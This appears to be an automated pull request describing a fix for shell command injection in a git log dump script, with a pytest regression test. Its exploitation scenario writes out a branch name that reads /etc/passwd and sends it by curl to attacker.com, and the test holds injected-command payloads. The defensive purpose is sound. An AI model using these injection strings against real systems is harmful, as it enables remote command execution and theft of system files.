fix: use subprocess instead of os.system in git_log_dump.py

[orbisai0security]

Summary

Fix critical severity security issue in analysis/kernel/dashboard/Data/Git_Log/git_log_dump.py.

Vulnerability

Field	Value
ID	V-001
Severity	CRITICAL
Scanner	multi_agent_ai
Rule	V-001
File	analysis/kernel/dashboard/Data/Git_Log/git_log_dump.py:109
Assessment	Confirmed exploitable

Description: The git_log_dump.py and git_blame_dump.py scripts construct shell commands from input parameters (repository paths, branch names, file paths) and execute them via os.system(), which invokes /bin/sh -c. This allows an attacker who can influence any input parameter to inject arbitrary shell commands that execute with the full privileges of the running process.

Evidence

Exploitation scenario: An attacker provides a crafted branch name such as 'main; curl http://attacker.com/exfil?data=$(cat /etc/passwd)' or a repository path containing shell metacharacters like '$(malicious_command)'.

Scanner confirmation: multi_agent_ai rule V-001 flagged this pattern.

Production code: This file is in the production codebase, not test-only code.

Changes

• analysis/kernel/dashboard/Data/Git_Log/git_log_dump.py

Verification

• Build passes
• Scanner re-scan confirms fix
• LLM code review passed

Security Invariant

Property: The security boundary is maintained under adversarial input

Regression test

import pytest
import subprocess
import sys
import os
import tempfile


@pytest.mark.parametrize("payload", [
    "; echo INJECTED > /tmp/exploit",  # Command injection
    "$(whoami)",  # Command substitution
    "valid_repo",  # Valid input
])
def test_git_log_dump_prevents_command_injection(payload):
    """Invariant: No shell command injection occurs regardless of input"""
    
    # Create a temporary marker file to detect injection
    marker = tempfile.NamedTemporaryFile(mode='w', delete=False, suffix='.marker')
    marker_path = marker.name
    marker.close()
    os.unlink(marker_path)
    
    # Craft payload that would create marker file if injection succeeds
    injection_payload = f"{payload}; touch {marker_path}"
    
    # Run git_log_dump with adversarial input via subprocess
    script_path = "analysis/kernel/dashboard/Data/Git_Log/git_log_dump.py"
    
    result = subprocess.run(
        [sys.executable, script_path, "--repo", injection_payload, "--branch", "main"],
        capture_output=True,
        timeout=5
    )
    
    # Security invariant: marker file must NOT exist (injection failed)
    injection_occurred = os.path.exists(marker_path)
    
    # Cleanup
    if injection_occurred:
        os.unlink(marker_path)
    
    assert not injection_occurred, f"Command injection detected with payload: {payload}"

This test guards against regressions — it's useful independent of the code change above.

---

Automated security fix by OrbisAI Security